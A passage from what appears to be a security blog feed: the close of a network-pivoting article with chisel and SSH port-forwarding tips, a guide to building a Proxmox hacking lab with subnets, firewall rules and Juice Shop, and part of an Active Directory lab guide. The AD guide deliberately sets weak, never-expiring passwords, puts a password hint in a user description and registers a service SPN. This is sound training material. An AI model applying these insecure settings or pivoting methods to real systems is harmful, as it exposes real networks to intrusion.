As we conclude, let&apos;s cherish this knowledge that arms us with the ability to navigate and penetrate complex network environments. This chapter is more than just a learning experience; it&apos;s a stepping stone to the vast, unexplored territories of advanced network penetration techniques.

So, as we close this chapter, let&apos;s not just walk away with new skills but also with an invigorated passion to delve deeper, explore further, and keep the flame of curiosity alive in the ever-exciting world of network security. Happy pivoting, and see you in the next adventure!

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is chisel and what is its main purpose?&lt;/summary&gt;

Chisel is a tool that works in a client/server model that will allow us to create network tunnels to access the internal network from a machine that we have previously compromised.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main difference between remote port forwarding and local port forwarding?&lt;/summary&gt;

The main difference between local port forwarding and remote port forwarding in SSH is the direction of traffic flow: local port forwarding redirects traffic from the local machine to the remote server, while remote port forwarding redirects traffic from a remote machine to the local machine via the SSH server.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main advantage of remote port forwarding?&lt;/summary&gt;

The main advantage of remote port forwarding is that, since the direction of traffic is from the victim machine to the client, it makes it easier to bypass mechanisms that provide protection such as firewalls.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What facilitates the use of dynamic port forwarding?&lt;/summary&gt;

When using dynamic port forwarding, thanks to a SOCKS server, we are able to access all the services to which the compromised machine has access. This means that, for example, we can reach SSH or RDP services of internal machines that were previously unreachable, in a much more convenient way.
&lt;/details&gt;

# Resources

[GitHub - t3l3machus/pentest-pivoting: A compact guide to network pivoting for penetration testings / CTF challenges.](https://github.com/t3l3machus/pentest-pivoting)</content:encoded><author>Ruben Santos</author></item><item><title>Building an Adaptable Hacking Lab: Subnets, Static IPs, and Services</title><link>https://www.kayssel.com/post/lab-3</link><guid isPermaLink="true">https://www.kayssel.com/post/lab-3</guid><description>This article covers setting up subnets, static IPs, firewalls in Proxmox, and configuring Windows, Kali, Ubuntu servers. It includes Docker setup for web service deployment, creating a versatile cybersecurity lab environment.</description><pubDate>Fri, 22 Sep 2023 13:00:54 GMT</pubDate><content:encoded># Introduction: Crafting a Versatile Cybersecurity Lab in Proxmox

Welcome back to our series on building a dynamic hacking lab with Proxmox! After a brief hiatus, we&apos;re diving deeper into the nuances of lab setup to enhance your cybersecurity practice. This chapter is all about expanding your lab&apos;s capabilities, focusing on advanced network configurations and service deployment techniques.

We&apos;ll explore the intricacies of subnet creation and management within Proxmox, ensuring your lab&apos;s network is both structured and versatile. This includes assigning static IPs to machines and understanding the significance of subnets in controlled network environments.

Furthermore, we delve into the world of traffic redirection and Internet access management for subnets, using tools like iptables for effective network routing. This is crucial for simulating real-world network scenarios and for practicing various network-based attacks and defenses.

Our journey also takes us through the practical application of Proxmox firewalls. Here, you&apos;ll learn to simulate internal network conditions, a skill essential for internal penetration testing and pivoting exercises.

Additionally, we&apos;ll set up an Ubuntu server with essential services like SSH and web applications using Docker. This not only adds another layer to your lab but also provides a sandbox for practicing web hacking techniques, a critical skill in the arsenal of any cybersecurity enthusiast.

By the end of this chapter, you&apos;ll have a comprehensive lab environment. It&apos;s not just a playground for Active Directory hacking but a versatile space for practicing a wide array of cybersecurity skills, from network pivoting to web application penetration testing. Let&apos;s get started and expand the horizons of your cybersecurity lab!

# Envisioning Our Lab: A Networked Realm for Diverse Cybersecurity Practices

![](/content/images/2023/09/imagen-1.png)

Hacking Lab

  
As we embark on the setup of our Proxmox-based cybersecurity lab, let&apos;s conceptualize the network layout and its intended functionalities. Our lab will feature two primary network segments, each serving distinct purposes and hosting different sets of machines.

1.  **The External Network**: This segment forms the backbone of our lab. Here, we will host our Kali Linux machine, an essential tool for penetration testing and cybersecurity analysis. Alongside Kali, this network will house the majority of our Active Directory machines. This external setup mirrors a typical organizational network, providing a realistic environment for a broad range of cybersecurity exercises, from network scanning to Active Directory exploitation.
2.  **The Internal Network**: This is where our lab&apos;s complexity and versatility truly shine. Within this segment, we will have a dedicated Active Directory machine, &quot;PC-Beru&quot; in our case, which enjoys exclusive access to this internal realm. This segregation makes &quot;PC-Beru&quot; a critical pivot point for practicing advanced techniques like network pivoting and lateral movement.
3.  **The Beru-Internal Machine**: As a specialized component of our internal network, the &quot;Beru-Internal&quot; machine is designated for hosting various web services. This setup allows us to delve into web application hacking techniques, providing a safe and controlled environment to test vulnerabilities and defensive strategies in web-based applications.

With this tripartite network structure, our lab evolves into a comprehensive training ground, catering to a wide spectrum of cybersecurity practices. From the basics of network penetration testing with Kali Linux to the complexities of internal network exploitation and web application security, our lab is poised to offer a rich learning experience. Let&apos;s dive in and bring this cyber training arena to life!

# Setting Up Subnets in Proxmox: A Practical Guide

Embarking on our network customization journey in Proxmox, we&apos;re going to establish subnets that are both functional and pivotal for our lab setup. Let&apos;s start by creating these subnets: we navigate to &quot;pve -&gt; Network&quot; and select the option to create a new &quot;Linux Bridge&quot; network. Here, we&apos;ll define our subnet details.

![](/content/images/2023/09/Pasted-image-20230908083008.png)

Selection of &quot;Network Device&quot;

![](/content/images/2023/09/Pasted-image-20230908083334.png)

Set up subnet

For instance, I&apos;ve given the new bridge the address &quot;192.168.254.100/24&quot;, which makes &quot;192.168.254.100&quot; the gateway of the 192.168.254.0/24 subnet. Next, we replicate this process for the second bridge, using &quot;192.168.253.100/24&quot;. After configuring these subnets, don&apos;t forget to click &quot;Apply Configuration&quot; to save the changes.
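Behind the GUI, each bridge ends up as a stanza in /etc/network/interfaces on the Proxmox host; a sketch of what one of the new bridges might look like (bridge name and address as used in this lab, the remaining options being the Proxmox defaults):

```bash
auto vmbr1
iface vmbr1 inet static
    address 192.168.254.100/24
    bridge-ports none
    bridge-stp off
    bridge-fd 0
```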

![](/content/images/2023/09/Pasted-image-20230908083407.png)

Apply Configuration

  
Now, while our subnets exist, they lack internet connectivity. To remedy this, we need to input some crucial code into our server&apos;s /etc/network/interfaces file. This code, accessible through the pve shell, includes commands for IP forwarding and iptables rules for NAT (Network Address Translation). These iptables commands are critical for masquerading, which lets guests with private IP addresses access the network using the host&apos;s IP address for outgoing traffic.

Here&apos;s a snapshot of the code you&apos;ll need:

```bash
 post-up echo 1 &gt; /proc/sys/net/ipv4/ip_forward
 post-up iptables -t nat -A POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
 post-down iptables -t nat -D POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
 post-up iptables -t nat -A POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE
 post-down iptables -t nat -D POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE

```

![](/content/images/2023/09/imagen-2.png)

Proxmox network configuration

In essence, these commands enable our subnets to route traffic via the vmbr0 interface, which possesses internet access. Once you&apos;ve added these settings, you can restart the server or execute `ifreload -a` to apply these changes. This step ensures that our newly established subnets have access to the internet, bringing us a step closer to a fully functional lab environment.

# Configuring the Domain Controller in Proxmox for a New Subnet

Transitioning the domain controller to fit into our newly created subnet in Proxmox involves a few precise steps. Here’s a straightforward guide to get your domain controller rightly configured:

**Navigate to Network Settings**: Start by accessing the &quot;hardware&quot; tab of your domain controller in Proxmox. Here, you&apos;ll find the network device settings of the machine.

![](/content/images/2023/09/Pasted-image-20230913092215.png)

Change network interface to use

  
**Switch Network Bridge**: Change the network bridge from vmbr0 to vmbr1. This action relocates your domain controller to the new subnet we&apos;ve set up earlier.

![](/content/images/2023/09/Pasted-image-20230909175915.png)

Change network interface to use the new subnetwork

**Assign a Static IP**: Now, it&apos;s time to ensure your domain controller has a fixed IP within the new subnet. To do this, go to the &quot;Network and Sharing Center&quot; on your domain controller. Look for &quot;Ethernet instance 0&quot; and access its properties.

![](/content/images/2023/09/Pasted-image-20230909180739.png)

Selection of &quot;Ethernet Instance 0&quot;

**Set the IP Address**: In the &quot;Internet Protocol Version 4&quot; settings, assign the desired static IP address. This step is crucial as it defines the domain controller&apos;s position within the subnet&apos;s IP range.

![](/content/images/2023/09/Pasted-image-20230914082550.png)

Properties

  

![](/content/images/2023/09/Pasted-image-20230909180653.png)

Configure the domain controller&apos;s static IP address

**Verify Internet Connectivity**: After configuring the static IP, ensure that the domain controller has Internet access. If the subnets are correctly configured, your domain controller should seamlessly connect to the Internet.

![](/content/images/2023/09/imagen-3.png)

We see that we have internet connection

# Configuring Windows Machines for Dual Subnet Access in Proxmox

Setting up Windows machines in Proxmox to access both internal (vmbr2) and external (vmbr1) networks is a multi-step process that involves network device configuration and IP settings. Here’s how to do it:

**Network Device Addition**: In Proxmox, select your Windows machine and navigate to the Network settings. Use the &quot;Add&quot; button to introduce a new network device, enabling access to the second subnet.

![](/content/images/2023/09/imagen-4.png)

Add a new network device

  
**Assigning to Subnets**: Configure the newly added network device for the internal network (vmbr2). This setup ensures the Windows machine can access both the internal and external networks, making it pivotal for network pivoting exercises.  

![](/content/images/2023/09/imagen-5.png)

Select vmbr2 for the second interface

**First Network Device Configuration**: The first network device should be set to the external network (vmbr1). This arrangement allows the machine to communicate with other devices on the external network.

![](/content/images/2023/09/imagen-7.png)

Select vmbr1 from the first interface

**DNS Configuration**: On the first Ethernet setting in Windows, ensure the DNS is set to the IP of your domain controller. This step is crucial for the machine to recognize and interact with the domain established in your lab.

![](/content/images/2023/09/imagen-8.png)

Change adapter options

![](/content/images/2023/09/imagen-9.png)

Instances that we have previously configured

![](/content/images/2023/09/imagen-10.png)

Static IP configuration of Windows machine of the first interface

**Second Network Interface Setup**: Configure the second network interface with an appropriate static IP but leave the gateway field blank. This omission prevents network conflicts with the first interface.

![](/content/images/2023/09/imagen-12.png)

Static IP configuration of Windows machine of the second interface

**Final Verification**: After completing these configurations, verify that the Windows machine has access to both the Internet and the domain. Successful access indicates a correct setup and readiness for network-related exercises, including pivoting.

![](/content/images/2023/09/imagen-13.png)

We see that we have both internet and domain access
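For reference, the same dual-homed setup can be applied from an elevated command prompt instead of the GUI. The interface names, addresses, and DNS server below are assumptions for this lab; substitute your own subnets and domain controller IP:

```bash
REM First NIC (external, vmbr1): static IP, gateway, and the DC as DNS server
netsh interface ipv4 set address name=Ethernet0 static 192.168.253.50 255.255.255.0 192.168.253.100
netsh interface ipv4 set dnsservers name=Ethernet0 static 192.168.253.2 primary

REM Second NIC (internal, vmbr2): static IP but NO gateway, to avoid routing conflicts
netsh interface ipv4 set address name=Ethernet1 static 192.168.254.50 255.255.255.0
```

Leaving the gateway argument off the second `netsh` call mirrors the blank gateway field in the GUI step above.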

# Configuring Kali Linux in Proxmox for External Network Access

Setting up Kali Linux for external network access in Proxmox is a straightforward process, primarily focusing on the network interface configuration. Here&apos;s a step-by-step guide:

**Select Network Interface**: In Proxmox, choose the Kali Linux machine and navigate to its network settings. Select the option to place the machine on the external network, which is usually denoted as vmbr1 in Proxmox.

![](/content/images/2023/09/imagen-14.png)

Select the external network interface

**Modify Network Configuration File**: Access the Kali Linux machine and open the `/etc/network/interfaces` file. This file contains the configuration for network interfaces.

**Static IP Configuration**: Edit the file to set a static IP address for the primary network interface (typically `eth0`). For example:

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ cat /etc/network/interfaces   
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
 address 192.168.253.128
 netmask 255.255.255.0
 gateway 192.168.253.100

```

This configuration assigns a static IP (192.168.253.128) to Kali Linux, with the appropriate netmask and gateway settings for external network access.
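Before restarting, a quick sanity check helps catch typos in the file: with a 255.255.255.0 netmask, the address and gateway must share the same first three octets. A minimal POSIX-shell sketch using the values above (no lab access needed):

```bash
# Sanity-check that a static address and its gateway share the same /24.
# Values are the ones used above; the 255.255.255.0 netmask is assumed.
ADDRESS=192.168.253.128
GATEWAY=192.168.253.100
addr_net=${ADDRESS%.*}   # strip the last octet -> 192.168.253
gw_net=${GATEWAY%.*}
if [ $addr_net = $gw_net ]; then
  echo OK: $ADDRESS and $GATEWAY share the same /24
else
  echo MISMATCH: $addr_net vs $gw_net
fi
```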

**Restart for Changes to Take Effect**: Once the configuration file is updated, restart the Kali Linux machine to apply the new network settings.

# Setting Up an Ubuntu Server in Proxmox for Internal Network Simulation

To simulate a computer on the internal network, let&apos;s create an Ubuntu Server machine running web and SSH services. Here are a couple of screenshots of the configuration I have done:

**Initial Setup and Configuration**: In Proxmox, create a new virtual machine and choose Ubuntu Server as the operating system. Configure the general options, OS, system, disk, CPU, memory, and importantly, set the network to connect to your internal network (typically vmbr2 in Proxmox).

![](/content/images/2023/09/imagen-16.png)

General options

![](/content/images/2023/09/image-6.png)

OS options

![](/content/images/2023/09/image-7.png)

System options

![](/content/images/2023/09/image-8.png)

Disks options


![](/content/images/2023/09/image-9.png)

CPU options

![](/content/images/2023/09/image-10.png)

Memory options

![](/content/images/2023/09/image-25.png)

Network options (vmbr2)

![](/content/images/2023/09/image-11.png)

Confirm the creation of the virtual machine

**Language and Keyboard Configuration**: Start the Ubuntu Server machine and select the preferred system and keyboard language during the initial setup process.

![](/content/images/2023/09/image-12.png)

Language selection

![](/content/images/2023/09/image-13.png)

Keyboard selection

**Network Configuration**: Assign a static IP address to the Ubuntu Server to ensure it resides within your internal subnet. This step is crucial for the server to have Internet access and to be reachable within the internal network.

![](/content/images/2023/09/image-14.png)

Network configuration

**Default File System and Disk Space**: Proceed with the default file system setup and allocate the required disk space for the server.

![](/content/images/2023/09/image-15.png)

Default file system

![](/content/images/2023/09/image-16.png)

File system data

**User Creation and Machine Naming**: Create a primary user for the server and set a hostname for easy identification within the network.

![](/content/images/2023/09/image-17.png)

User configuration

**Installing OpenSSH**: During the setup process, select the option to install OpenSSH. This allows for remote access to the server via SSH, which is essential for managing the server and deploying services.

Complete the installation process, and once the server is up and running, verify that it has proper connectivity to both the internal network and the Internet.

### Firewall Configuration: Simulating an Internal Network

Creating an effective internal network simulation involves utilizing Proxmox&apos;s firewall capabilities. Start by navigating to &quot;Firewall -&gt; Options&quot; in Proxmox and switch the firewall setting from &quot;No&quot; to &quot;Yes&quot;. This change sets the stage for more specific network control.

![](/content/images/2023/09/image-18.png)

Enable the firewall

Next, dive into the rule creation process by adding new rules. The first rule is designed to block all TCP traffic originating from the external network, specifically the 192.168.253.0/24 subnet. This rule is crucial for ensuring that only desired traffic reaches our internal network.

![](/content/images/2023/09/image-19.png)

Deny inbound TCP traffic

In addition to the TCP traffic block, implement a rule to deny ICMP traffic. This step further tightens our network&apos;s security, preventing standard ping requests from reaching the internal network.

![](/content/images/2023/09/image-20.png)

Deny inbound ICMP traffic

After establishing these rules, the Proxmox firewall section should display the configurations clearly, signifying the successful implementation of your firewall settings.

![](/content/images/2023/09/image-21.png)

Firewall control panel

To confirm the effectiveness of these firewall rules, conduct a simple test. Try pinging from the Kali machine to the Ubuntu machine, both with and without the ICMP rule activated. This test will demonstrate the firewall&apos;s impact on network traffic. Additionally, verify that the Windows machine, which is connected to both the internal and external networks, has proper access as expected. This comprehensive approach ensures your internal network simulation is functioning as intended, providing a realistic environment for network management and security testing.
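The same rules can also be kept in Proxmox&apos;s firewall configuration files rather than the GUI. The sketch below is a hedged approximation of a per-VM `/etc/pve/firewall/&lt;vmid&gt;.fw` file mirroring the two rules above; the exact path and rule syntax are assumptions, so check the Proxmox firewall documentation before relying on them:

```bash
# /etc/pve/firewall/<vmid>.fw - sketch mirroring the GUI rules created above
[OPTIONS]
enable: 1

[RULES]
# Block TCP traffic from the external subnet
IN DROP -p tcp -source 192.168.253.0/24
# Block ping from the external subnet
IN DROP -p icmp -source 192.168.253.0/24
```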

### Docker Installation and Configuration for Web Services

With the firewall configured, our next step is to install Docker on the Ubuntu machine. Docker simplifies the process of deploying various services. For a streamlined installation, use the script available on GitHub, specifically designed for Docker installation.

GitHub Repository: [Docker/docker-install](https://github.com/docker/docker-install) This repository provides an automated Docker installation script, making the setup process more efficient.

Post-installation, ensure your user has the necessary permissions to deploy containers by adding them to the Docker group. Execute the following command:

```bash
sudo usermod -aG docker $USER

```

After adding the user to the Docker group, reboot the system to apply the changes.
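After logging back in, you can confirm the change took effect by checking the user&apos;s group list. This is a sketch: the `set --` line below is a stand-in for real output so the check is self-contained; on the lab machine you would feed it `id -nG` instead:

```bash
# Stand-in for real output; on the lab box use instead: set -- $(id -nG)
set -- rsgbengi adm sudo docker

# POSIX loop: check whether docker appears among the groups
found=no
for g in $@; do
  [ $g = docker ] && found=yes
done
echo docker group: $found
```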

Now, let&apos;s deploy a web service for practicing web hacking techniques. For this tutorial, we&apos;ll use &quot;Juice Shop,&quot; a deliberately vulnerable web application. Install and run Juice Shop using the following Docker commands:

```bash
docker pull bkimminich/juice-shop
docker run --rm -p 3000:3000 bkimminich/juice-shop

```

![](/content/images/2023/09/image-22.png)

Downloading juice-shop


![](/content/images/2023/09/image-23.png)

Execution of the container

These commands pull the Juice Shop image from Docker Hub and run it on port 3000. With Juice Shop up and running, you should be able to access it from the Windows machine within your network. If necessary, like in this scenario, you can temporarily disable the TCP firewall rule to test access from other machines, such as Kali Linux.

![](/content/images/2023/09/image-24.png)

Page accessed from Kali
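Reachability can also be checked from another machine without opening a browser. The address below is a placeholder for the Ubuntu server&apos;s IP on the internal network:

```bash
# <ubuntu-ip> is a placeholder - substitute the static IP you assigned on vmbr2
curl -s -o /dev/null -w &quot;%{http_code}\n&quot; http://&lt;ubuntu-ip&gt;:3000

# A 200 response means Juice Shop is up and the firewall is letting you through
```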

This setup provides a practical environment to hone your web hacking skills, using Juice Shop as a safe, legal platform for testing and learning. Remember, you can install other web hacking labs on this machine to diversify your practice scenarios.

# Conclusion: Building a Comprehensive Lab for Diverse Cybersecurity Practices

In this guide, we&apos;ve taken significant strides in creating a robust, versatile cybersecurity lab within Proxmox. Our journey included configuring subnets to ensure network segmentation and implementing static IP assignments across various machines. This setup not only aids in organizing our lab but also plays a crucial role in network management and security.

The introduction of firewall rules in Proxmox was a crucial step. It not only provided an additional layer of security but also enabled us to simulate more realistic network environments. These environments are essential for practicing advanced cybersecurity techniques like pivoting and internal network attacks.

The installation and configuration of Docker on Ubuntu added another dimension to our lab, allowing for the deployment of various services with ease. By setting up Juice Shop, we created an environment to practice web hacking safely and legally, an invaluable resource for sharpening penetration testing skills.

This comprehensive setup, encompassing both Active Directory hacking and web application vulnerabilities, paves the way for a well-rounded cybersecurity practice. Whether you&apos;re honing your skills in network pivoting, exploring web vulnerabilities, or testing Active Directory attacks, this lab provides a solid foundation for a wide range of cybersecurity exercises.

As we progress, the lab will continue to evolve, adapting to new challenges and techniques in the ever-changing landscape of cybersecurity. Happy hacking!

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What do I have to do in proxmox if I want my subnets to have internet access ?&lt;/summary&gt;

```bash
 post-up echo 1 &gt; /proc/sys/net/ipv4/ip_forward
        post-up iptables -t nat -A POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
        post-down iptables -t nat -D POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
        post-up iptables -t nat -A POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE
        post-down iptables -t nat -D POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE

```

I have to redirect the traffic of the created subnets out through the interface that does have Ethernet access; in the example above, that is **vmbr0**. To do this, I use iptables to set up NAT (masquerade) rules that forward the traffic, so that the Proxmox host works as if it were a router.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do I have to do to make a machine belong to a new subnet?&lt;/summary&gt;

First, I have to select in the Proxmox network configuration of the machine that I want to use the network interface corresponding to the subnet where I want to add it.

![](/content/images/2023/09/image-28.png)

Once this is done, I have to statically configure the IP of the machine. On Windows machines this is done through the network configuration menus, while on Linux machines it is mostly done in /etc/network/interfaces.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can I simulate a private network in a simple way?&lt;/summary&gt;

I can make use of the Proxmox Firewall to create different firewall rules that allow me to choose which traffic I want to reach a certain machine. For example, I can create rules that deny TCP traffic to a certain subnet or ICMP traffic, thus making other machines unable to ping.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can I install docker in a simple way in linux and what do I have to do so that my user can create containers without being root ?&lt;/summary&gt;

I can use the following script to automate the installation of docker:

[GitHub - docker/docker-install: Docker installation script](https://github.com/docker/docker-install)

On the other hand, for my user to be able to run containers without being root, I have to add it to the docker group. I can do this with the following command:

```bash
sudo usermod -aG docker $USER

```
&lt;/details&gt;

# Resources

[Network Configuration - Proxmox VE](https://pve.proxmox.com/wiki/Network_Configuration)</content:encoded><author>Ruben Santos</author></item><item><title>Configuring a Proxmox-Based Hacking Lab: Active Directory and Windows Setup</title><link>https://www.kayssel.com/post/lab-2</link><guid isPermaLink="true">https://www.kayssel.com/post/lab-2</guid><description>In this chapter, we finalize driver setups for Windows in Proxmox and configure an Active Directory for practice attacks. We cover driver installation, domain controller setup, certificate services, user creation, and SMB enablement, preparing a complete hacking lab environment.</description><pubDate>Fri, 08 Sep 2023 12:29:12 GMT</pubDate><content:encoded># Kicking Off: Advancing Your Hacking Lab with Proxmox and Active Directory

Welcome back! After a brief summer hiatus, I&apos;m excited to dive back into our series on crafting a hacking lab with Proxmox. This chapter marks a significant leap forward as we delve into the final touches on Windows machine driver configurations and embark on setting up a fully operational Active Directory environment. This setup is not just about technical configuration; it&apos;s a playground for honing your skills in a variety of attacks seen in the Active Directory series.

In this installment, we&apos;ll tackle the intricacies of Active Directory configurations, from driver installations to domain controller setups. We&apos;ll walk through each step methodically, ensuring you have a solid understanding of the process and its importance in a simulated attack environment. This guide is designed to be your roadmap for creating a realistic and functional Active Directory domain within Proxmox, where you can safely practice and master numerous attack strategies.

Whether you&apos;re refining your skills or just starting, this chapter is crafted to enhance your understanding and execution of complex network setups. So, with the previous article as our foundation, let&apos;s embark on this journey to build a robust and versatile hacking lab. Let&apos;s get started!

# Configuring Drivers on Your Domain Controller: A Step-by-Step Guide

Our journey continues from where we left off in the first article. Upon logging into our domain controller, we&apos;re greeted with the familiar Server Manager interface. If you&apos;ve reached this stage without a hitch, it&apos;s time to get those drivers up and running.

![](/content/images/2023/09/Pasted-image-20230831083549.png)

Server Manager interface

Let&apos;s navigate to &quot;This PC,&quot; where we&apos;ll delve into its properties and access the device manager. Here, you&apos;ll likely spot three devices flagged with issues. Fear not - let&apos;s tackle them one by one.

![](/content/images/2023/09/Pasted-image-20230831083850.png)

Select &quot;Device Manager&quot;.

![](/content/images/2023/09/Pasted-image-20230831083929.png)

Displays of the three devices giving errors

## **Updating the First Device**

Right-click on the first device with an error, choose &apos;Update driver,&apos; then &apos;Browse my computer for driver software,&apos; and finally hit &apos;Browse.&apos; Hunt down the version of your operating system and select the &apos;amd64&apos; folder. This should get the internet connection driver up and running smoothly.

![](/content/images/2023/09/Pasted-image-20230831084204.png)

Selection of driver for internet connection

![](/content/images/2023/09/Pasted-image-20230831084228.png)

Driver successfully installed

## **Addressing the Remaining Devices**

The process for the other two devices is similar but with a slight tweak. This time, head straight to the &apos;D:&apos; drive, which houses the necessary drivers.

![](/content/images/2023/09/Pasted-image-20230831084948.png)

Install the rest of the devices starting from the &quot;D:&quot; drive

With all drivers functioning, our path is clear to proceed with the Active Directory setup. Remember, this driver configuration is a must-do for every Windows machine in your domain.

# **Active Directory Configuration: Building Your Digital Fortress**

Before we dive into the nitty-gritty of Active Directory setup, here’s a quick tip: If you’re locked out and facing the &apos;ctrl+alt+delete&apos; prompt, a simple click on the screen lock unlocking button (as shown below) will set you free.

![](/content/images/2023/09/image.png)

Screen lock unlocking

## Domain controller

Start by giving your machine a personalized touch with a new name. Choose a theme close to your heart - be it Marvel, Star Wars, or anything else. Head over to &apos;view your PC name&apos; and select &apos;Rename this PC&apos; to christen your domain controller.

![](/content/images/2023/09/image-1.png)

Search for the option to rename the machine

![](/content/images/2023/09/Pasted-image-20230831085639.png)

Change machine name

### Installation of active directory functionalities

Post-renaming and a quick reboot, reopen &apos;Server Manager.&apos; From here, click &apos;Manage,&apos; followed by &apos;Add roles and features.&apos;

![](/content/images/2023/09/image-2.png)

Add roles and Features

Progress through the steps until you reach the &apos;Active Directory Domain Services&apos; selection. Add this feature and march towards the end of the installation.

![](/content/images/2023/09/Pasted-image-20230831090550.png)

Active Directory Domain Services

![](/content/images/2023/09/Pasted-image-20230831090719.png)

Completion of installation

## **Elevating to a Domain Controller**

Once the installation wraps up, click on &apos;Promote this server to a domain controller.&apos;

![](/content/images/2023/09/Pasted-image-20230831090914.png)

Promote this server to a domain controller

Input your chosen domain name, ensuring it ends with &apos;.local.&apos; Opt for &apos;Add new forest&apos; and proceed to set your administrative password.

![](/content/images/2023/09/Pasted-image-20230831091008.png)

Domain name configuration

![](/content/images/2023/09/Pasted-image-20230831091042.png)

Forest name configuration

![](/content/images/2023/09/Pasted-image-20230831091129.png)

Restoration service configuration

Follow through with the setup steps until you hit the final install prompt. A machine reboot is on the cards post-installation.

![](/content/images/2023/09/Pasted-image-20230831091400.png)

Completion of the configuration

### Certificate Service

Back in the Server Manager, it&apos;s time to add the certificate service, crucial for launching LDAPs and IPv6 attacks. Repeat the &apos;Add roles and features&apos; steps, but this time, select &apos;Active Directory Certificate Services&apos; and add the required features.

![](/content/images/2023/09/Pasted-image-20230901080254.png)

Installation of &quot;Active Directory Certificate Services&quot;

We will continue until we get to the confirmation section where we will check the box indicated in the following image and then proceed with the installation.

![](/content/images/2023/09/Pasted-image-20230901080431.png)

Completion of the installation

Post-installation, configure the certificate service, opting for &apos;Certification Authority&apos; under &apos;Role Service.&apos; Set a generous &apos;Validity Period&apos; of 99 years (who knows how long your lab will be operational!), and finalize the setup with a &apos;Configure&apos; click and a machine restart.

![](/content/images/2023/09/Pasted-image-20230901080600.png)

Certificate service configuration

![](/content/images/2023/09/Pasted-image-20230901080650.png)

Certification Authority

![](/content/images/2023/09/Pasted-image-20230901080751.png)

Validity period

![](/content/images/2023/09/Pasted-image-20230901080829.png)

Final configuration

### User creation

With the essential setup done, let&apos;s populate our domain with users. Navigate to &apos;Tools&apos; and select &apos;Active Directory Users and Computers.&apos;

![](/content/images/2023/09/Pasted-image-20230901081048.png)

Active Directory Users and Computers

Organize by creating a new &apos;Groups&apos; organizational unit. Migrate all objects except &apos;Administrator&apos; and &apos;Guest&apos; from the &apos;Users&apos; unit into this new group.

![](/content/images/2023/09/Pasted-image-20230901081243.png)

Creation of new organizational unit

![](/content/images/2023/09/Pasted-image-20230901081303.png)

&quot;Groups&quot; unit

![](/content/images/2023/09/Pasted-image-20230901081352.png)

Copy all the groups to their corresponding unit

![](/content/images/2023/09/Pasted-image-20230901081430.png)

Organized User unit

Now, for the fun part - creating a new user. Right-click in the Users unit, select &apos;New -&gt; User,&apos; and fill in the details. Choose a memorable logon name and a not-so-secure password for easy attack practice. For convenience, set the password to never expire.

![](/content/images/2023/09/Pasted-image-20230901081628.png)

User creation interface

![](/content/images/2023/09/Pasted-image-20230901081737.png)

Setting the password to never expire
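The same user can be created from an elevated command prompt with `dsadd`. The distinguished name, logon name, and password below are illustrative values for this lab&apos;s SHADOW.local domain; adjust them to your own:

```bash
REM Create a lab user with a weak, never-expiring password (illustrative values)
dsadd user &quot;CN=beru,CN=Users,DC=SHADOW,DC=local&quot; -samid beru -pwd Password1! -disabled no -pwdneverexpires yes
```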

To simulate a common enterprise scenario, create a service account, like a SQL account, using your first user as a template.

![](/content/images/2023/09/Pasted-image-20230901081908.png)

We use the user created as a template

![](/content/images/2023/09/Pasted-image-20230901082031.png)

SQL Service user created

Add a password hint in the description as a nod to common administrative oversights.

![](/content/images/2023/09/Pasted-image-20230901082148.png)

User description with password

Promote this account to a service account using the &apos;setspn&apos; tool via CMD.

```bash
setspn -a DC-SHADOW/SQLService.SHADOW.local:60111 SHADOW\SQLService

```

![](/content/images/2023/09/Pasted-image-20230901082447.png)

Make SQL account Service account

To verify that it has been successfully created, we can use the following command:

```bash
setspn -T SHADOW.local -Q */*

```

![](/content/images/2023/09/Pasted-image-20230901082632.png)

Show all service accounts

### Shared folder setup

Setting up SMB is crucial for various reconnaissance and attack practices. Start by creating a &apos;Resources&apos; shared folder on the C drive.

![](/content/images/2023/09/Pasted-image-20230901082814.png)

Creation of the &quot;Resources&quot; shared folder

Head to &apos;File and Storage Services&apos; in the Server Manager and opt to create a new folder.

![](/content/images/2023/09/Pasted-image-20230901082851.png)

File and Storage Services

Here, under &quot;Tasks&quot;, we will select the option to create a new folder.

![](/content/images/2023/09/Pasted-image-20230901082929.png)

Creation of new folder

In this configuration screen, the only thing we have to do is specify the location of the folder we have just created in &quot;Share location&quot;.

![](/content/images/2023/09/Pasted-image-20230901083012.png)

Sharing folder path

![](/content/images/2023/09/Pasted-image-20230901083042.png)

Selection of previously created folder

Once this is done, we will continue until the configuration is complete.

![](/content/images/2023/09/Pasted-image-20230901083150.png)

Continue until the configuration is complete
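For reference, the same share can be created from an elevated command prompt. The share name and path match the &quot;Resources&quot; folder above; the read-only grant to Everyone is an assumption, so adjust the permissions to your lab&apos;s needs:

```bash
REM Equivalent share creation from an elevated prompt (permissions are an assumption)
net share Resources=C:\Resources /GRANT:Everyone,READ

REM List existing shares to confirm
net share
```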

This is all for the basic configuration of the domain controller, now we will move on to the Windows machines that you want to join the domain.

# **Prepping Windows Machines for Domain Integration**

Continuing with our detailed guide, let&apos;s focus on preparing each computer for domain integration. This process is essential for all machines you plan to include in your domain. Here&apos;s how you can seamlessly integrate them:

**Renaming Your Computer:**

1.  Start by giving each computer a unique identifier that aligns with your domain&apos;s theme or preference.
2.  Locate the &apos;Rename your PC&apos; option in the Windows search bar. This simple step allows you to personalize each machine, making it easier to distinguish them within your network.
